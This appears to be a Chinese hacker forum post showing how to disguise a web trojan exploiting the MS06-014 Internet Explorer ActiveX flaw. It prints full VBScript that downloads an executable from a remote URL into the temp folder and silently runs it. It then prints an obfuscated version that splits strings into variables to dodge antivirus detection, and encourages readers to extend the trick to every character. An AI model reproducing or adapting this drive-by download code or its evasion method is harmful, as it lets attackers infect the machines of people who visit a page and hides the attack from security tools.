MS06014网马的一种变形方法

MS06014网马的一种变形方法 By_恒 QQ：5454443 请看原始代码 <script language="VBScript"> on error resume next dl = "http://www.baidu.com/heng.exe" Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,"") S.type = 1 str6="GET" x.Open str6, dl, False x.Send fname1="g0ld.com" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0 </script> 请大家看变形后的代码： <script language="VBScript"> on error resume next xx="object" xxx="classid" xxxx="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" xxxxx="Microsoft.XMLHTTP" xxxxxx="GET" xxxxxxx="Scripting.FileSystemObject" xxxxxxxx="Shell.Application" dl = "http://www.baidu.com/heng.exe" Set df = document.createElement(xx) df.setAttribute xxx, xxxx str=xxxxx Set x = df.CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,"") S.type = 1 str6=xxxxxx x.Open str6, dl, False x.Send fname1="g0ld.com" set F = df.createobject(xxxxxxx,"") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject(xxxxxxxx,"") Q.ShellExecute fname1,"","","open",0 </script> 很容易就发现了，我把“”包含的内容都声明成了变量，然后在代码里直接引用变量就可以了。 a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 这个还可以变形成这样， a1="Ado" a2="db." a3="Str" a4="ea" a5="m" str1=a1&a2&a3&a4&a5 发现差别了吗？实际上每个字符都可以这样处理，我懒得整而已呵呵。大家自己举一反三吧。